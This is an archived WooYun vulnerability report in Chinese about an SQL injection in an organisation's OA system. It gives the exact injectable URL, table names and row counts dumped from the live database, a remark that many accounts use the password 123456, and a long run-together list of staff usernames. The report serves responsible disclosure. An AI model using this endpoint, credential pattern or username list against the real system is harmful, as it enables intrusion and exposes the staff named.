乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-18: 细节已通知厂商并且等待厂商处理中 2015-10-21: 厂商已经确认,细节仅向厂商公开 2015-10-31: 细节向核心白帽子及相关领域专家公开 2015-11-10: 细节向普通白帽子公开 2015-11-20: 细节向实习白帽子公开 2015-12-05: 细节向公众公开
RT
注入点http://www.scrcoa.com/yyoa/common/js/menu/test.jsp?doType=101&S1=*
列举几个表和数量
+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| udt_nodeprocinfo | 630980414 || nodetactics | 10352016 || p_nodetactics | 8655792 || flownode | 8438522 || udt_node | 7958054 || flownode_member | 4643323 || flow_branch | 4322367 || assess_node | 3215250 || p_flownode | 2744113 || p_flownode_member | 2604131 || flow_log | 1944099 || attachment_all | 1181994 || arc_folderitem | 971319 || boardsumnew | 891519 || document | 652701 || p_document | 508623 || commonnumbers | 482579 || oalogin | 438647 || oalogs | 327689 || hj_document_file | 314080 || udt_flow | 289991 || urge_item | 247343 || urger | 247343 || sms_log | 190318 || smssendcha | 190265 || doc_bbs | 92027 || board_potent | 74784 || assess_member | 71374 || arc_myfavorite | 69799 || assess_document | 41796 || portlet_channel_cfg | 39548 || utd_00245 | 37228 || publicinfobrowsehis | 33353 || utd_00322 | 31382 || utd_00456 | 29966 || messagehistory | 29462 || doc_appendix | 29460 || utm_00245 | 24729 || rel_info | 24434 |
然后登陆看下很多弱口令 密码都是123456
anbaoayxbaihuabclbjcgbbjcwbbjgsqyxsbbjgstryybbjgsxsbbjgszzbscbjhdbjkfcdhchendongqingchenjchenleichenpeishengchenxiangrongchenyajuncjjcwmcxhcyjczczlczrddqrdemodengguangjundingjiweidingxhdlydxhfcfengjunfmfrfzlqtgaohonggbjgcyghpgjgkfxyy1gkfxyy2guanqiuyanguojiujiangguoshuaiguyuzhongguzhihaogyjhejiehetthrinternhsjhtxhuangjingxihuangxinhujianhuyongmeihxkhxpzxhyjjiangaofanjiangxuemeijilinjjcwjjgljjxdjjzbcgjjzbcwjwmjywkanglilikedehongklykrlflfylhlhyliaoqinlinlifeilifenglijlijilijialilingliminliuchunyanliufangliuqingliuxnliuzhaoyinglixinlizhilmylujiongluljluoqiangliluquanlxflywlzlzlminjienichuanhongnihuiminnjnmjnptpanwenyipcdpglpublicationqqzqueyujingqxgryhscxshshenbinbinshendshenjieshenlishenxiaochishenzhibinshiqiangshizhansjsljsmkxsongbinsongkaisunliliswdsxgssygstaoyonghongtcgstshwangcywangerliwangfwanggwangjiayanwanglingwangweiwangywgqwlfwnwwpwsnwuhepingwuhongwujinwujinhuawxzwybwyfwyzxhfxiaolxiarunqiuxinchaobenxinyuxjfxrxxujialinxumxurongxuzengyiyangrongyangyalingyangylydydqydxyeqianyglyjbyjjylyyqhczxyuanlinghuiyzlzczcfzcjzdzfyzhangchengzhangdongmeizhangguorongzhanghairongzhanghongzhangjpzhanglzhangluzhangnanzhangwenzhangxiaolizhangxueqizhangyezhangyizhangzhigangzhaolizhaonazhengkaijunzhongxiaoxiongzhoujianwenzhucaifangzhuchuanmingzhuliqiangzhuqianzhuwenjiazhuwenjunzhuwenqianzjxzuochunzwhzybzyjzyqzzw
过滤
危害等级:中
漏洞Rank:5
确认时间:2015-10-21 20:40
感谢漏洞作者,已通知下属企业整改
暂无